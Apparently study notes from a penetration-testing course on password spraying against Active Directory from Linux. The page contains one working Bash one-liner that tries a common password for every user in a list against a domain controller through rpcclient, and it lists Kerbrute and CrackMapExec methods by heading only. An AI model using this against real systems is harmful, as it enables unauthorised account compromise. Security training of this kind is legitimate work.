Internal Password Spraying - from Linux ACTIVE Directory

Using a Bash one-liner for the Attack

• need valid_users.txt file

  • Password Spraying - Making a Target User List ACTIVE Directory

for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done
Copy

Using Kerbrute for the Attack

Using CrackMapExec & Filtering Logon Failures

Local Admin Spraying with CrackMapExec

Reference